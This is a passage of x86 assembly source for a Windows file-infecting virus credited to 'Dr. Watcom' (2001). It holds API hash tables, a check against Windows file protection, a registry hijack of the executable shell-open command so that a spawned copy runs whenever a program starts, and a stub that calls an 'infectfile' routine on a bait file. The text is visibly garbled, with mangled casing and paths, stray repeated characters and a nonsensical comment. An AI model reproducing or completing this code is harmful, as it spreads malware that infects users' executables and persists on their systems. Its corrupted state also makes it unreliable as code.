EXITPROCESS_ DD 0 CREATEPROCESS DD 0 LoadLibrary DD 0 GetProcaddress DD 0 GLOBALLOC DD 0 GetModuleFileName DD 0 GetStartupInfo DD 0 Getcommandline DD 0 GetWindowsDirectory DD 0 CloseHandle DD 0 CreateFile DD 0 CreateFilemapping DD 0 MapViewOffile DD 0 UnmapViewoffile DD 0 GetFileAttributes DD 0 SetFileAttributes DD 0 GetFileSize DD 0GetFileTime DD 0 SetFileTime DD 0 CopyFile DD 0 GetTickCount DD 0 GetSystemTime DD 0 Sleep DD 0 LSTRCAT DD 0 User_api_crc32: _MessageBox DD 0D8556CF7H _wsprintf DD 0A10A30B6H DD 00000000h User_API_Addr: Messagebox DD 0 WSPRINTF DD 0 Advapi_api_crc32: _REGOPENKEYEX DD 0CD195699H _REGCLOSEKEY DD 0841802AFH _RegSetValueex DD 05B9EC9C6H _RegSetValue DD 0e78187CEH DD 00000000h Advapi_API_Addr: RegopenKeyex DD 0 RegcloseKey DD 0 RegSetValueex DD 0 RegSetValue DD 0 Strings: SzvirusName DB Virus_Name, 0 Szviruscredits DB '[', Virus_Name, ']', Virus_Version, CRLF DB '(c) 2001 by Dr. Watcom', CRLF, CRLF DB 'Communio Gets US Closer To Our Dark Father', CRLF DB 'Come, Share Your Vitae with me', CRLF, 0 Szuser32 DB 'User32.dll', 0 SZADVAPI32 DB 'Advapi32.dll', 0 SZSFC DB 'sfc.dll', 0 SzsfcProc DB 'sfcisfileprotected', 0 SzregKey DB 'EXEFILE / Shell / Open / Command', 0 SzregValue DB spawn_name, '', 1, '"% 1"% *', 0 Szspawnfile db '/', spawn_name, 0 Padding DD? End: 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 屯 Host Code? ; Tangyu Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun, Tun. Fakehost: Mov ESI, Offset Szbait Call infectfile SUB ESP, 1024 MOV ESI, ESP Push 2 Push virus_size Push virus_size Push offset sztemplate PUSH ESI Call_wsprintfa Push 1040h Push offset sztitle PUSH ESI PUSH 0 Call Messageboxa Add ESP, 1024 Fakehost_quit: PUSH 0 Call EXITPROCESS 屯 屯 屯 屯 屯 屯 屯 屯 屯 End Start End
